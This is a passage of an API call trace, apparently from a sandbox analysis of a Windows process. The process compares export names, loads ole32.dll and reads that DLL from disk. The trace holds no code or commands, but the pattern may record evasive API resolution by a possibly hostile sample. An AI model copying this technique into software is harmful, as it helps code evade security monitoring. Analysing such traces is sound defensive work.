lpString2="AccessCheckByType") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 0 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0150.200] lstrcmpA (lpString1="AccessCheckByTypeAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 0 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAFinal") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAInit") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="A_SHAUpdate") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownA") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AbortSystemShutdownW") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheck") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByType") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultList", lpString2="AccessCheckByTypeResultList") returned 0 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAFinal") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAInit") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="A_SHAUpdate") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownA") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AbortSystemShutdownW") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheck") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByType") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultList") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 0 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAFinal") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAInit") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="A_SHAUpdate") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownA") returned 1 [0150.201] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AbortSystemShutdownW") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheck") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByType") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultList") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleA", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 0 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAFinal") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAInit") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="A_SHAUpdate") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownA") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AbortSystemShutdownW") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheck") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByType") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultList") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmByHandleW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 0 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAFinal") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAInit") returned 1 [0150.202] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="A_SHAUpdate") returned 1 [0150.203] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownA") returned 1 [0150.203] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AbortSystemShutdownW") returned 1 [0150.203] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheck") returned 1 [0150.203] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.203] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.203] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByType") returned 1 [0150.203] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0150.203] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0150.203] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultList") returned 1 [0150.203] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0150.203] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0150.203] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0150.203] lstrcmpA (lpString1="AccessCheckByTypeResultListAndAuditAlarmW", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 0 [0150.203] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAFinal") returned 1 [0150.203] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAInit") returned 1 [0150.203] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="A_SHAUpdate") returned 1 [0150.203] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownA") returned 1 [0150.203] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AbortSystemShutdownW") returned 1 [0150.203] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheck") returned 1 [0150.203] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.203] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.203] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByType") returned 1 [0150.203] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0150.205] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0150.205] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0150.205] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0150.205] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0150.205] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0150.205] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0150.205] lstrcmpA (lpString1="AddAccessAllowedAce", lpString2="AddAccessAllowedAce") returned 0 [0150.205] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAFinal") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAInit") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="A_SHAUpdate") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheck") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByType") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedAceEx", lpString2="AddAccessAllowedAceEx") returned 0 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAFinal") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAInit") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="A_SHAUpdate") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheck") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByType") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0150.206] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessAllowedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 0 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAFinal") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAInit") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="A_SHAUpdate") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownA") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AbortSystemShutdownW") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheck") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByType") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultList") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAce") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedAceEx") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAce", lpString2="AddAccessDeniedAce") returned 0 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAFinal") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAInit") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="A_SHAUpdate") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownA") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AbortSystemShutdownW") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheck") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByType") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0150.207] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultList") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAce") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedAceEx") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessAllowedObjectAce") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAce") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedAceEx", lpString2="AddAccessDeniedAceEx") returned 0 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAFinal") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAInit") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="A_SHAUpdate") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownA") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AbortSystemShutdownW") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheck") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmA") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckAndAuditAlarmW") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByType") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmA") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeAndAuditAlarmW") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultList") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmA") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleA") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmByHandleW") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AccessCheckByTypeResultListAndAuditAlarmW") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAce") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedAceEx") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessAllowedObjectAce") returned 1 [0150.208] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAce") returned 1 [0150.209] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedAceEx") returned 1 [0150.209] lstrcmpA (lpString1="AddAccessDeniedObjectAce", lpString2="AddAccessDeniedObjectAce") returned 0 [0150.209] lstrcmpA (lpString1="AddAce", lpString2="A_SHAFinal") returned 1 [0150.209] lstrcmpA (lpString1="AddAce", lpString2="A_SHAInit") returned 1 [0150.526] GetProcessHeap () returned 0x4d0000 [0150.526] HeapFree (in: hHeap=0x4d0000, dwFlags=0x0, lpMem=0x2c42010 | out: hHeap=0x4d0000) returned 1 [0150.534] GetProcessHeap () returned 0x4d0000 [0150.534] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x10) returned 0x4e9070 [0150.535] LoadLibraryA (lpLibFileName="Ole32.dll") returned 0x7ffc5e3e0000 [0150.535] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0150.535] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0150.536] GetModuleFileNameA (in: hModule=0x7ffc5e3e0000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")) returned 0x1d [0150.536] CreateFileA (lpFileName="C:\\Windows\\system32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x140 [0150.536] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0150.536] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0150.537] GetFileSizeEx (in: hFile=0x140, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=1322240) returned 1 [0150.537] GetProcessHeap () returned 0x4d0000 [0150.537] RtlAllocateHeap (HeapHandle=0x4d0000, Flags=0x0, Size=0x142d00) returned 0x4001040 [0150.540] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0150.540] ReadFile (in: hFile=0x140, lpBuffer=0x4001040, nNumberOfBytesToRead=0x142d00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x4001040*, lpNumberOfBytesRead=0x14f5a4*=0x142d00, lpOverlapped=0x0) returned 1 [0150.803] CloseHandle (hObject=0x140) returned 1 [0150.803] lstrcmpA (lpString1="BindMoniker", lpString2="BindMoniker") returned 0 [0150.803] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="BindMoniker") returned 1 [0150.803] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0150.803] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0150.803] lstrcmpA (lpString1="CLIPFORMAT_UserFreeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 0 [0150.803] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="BindMoniker") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserMarshalExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 0 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="BindMoniker") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFree64") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserFreeExt") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshal64") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserMarshalExt") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSize64") returned 1 [0150.804] lstrcmpA (lpString1="CLIPFORMAT_UserSizeExt", lpString2="CLIPFORMAT_UserSizeExt") returned 0 [0150.804] lstrcmpA 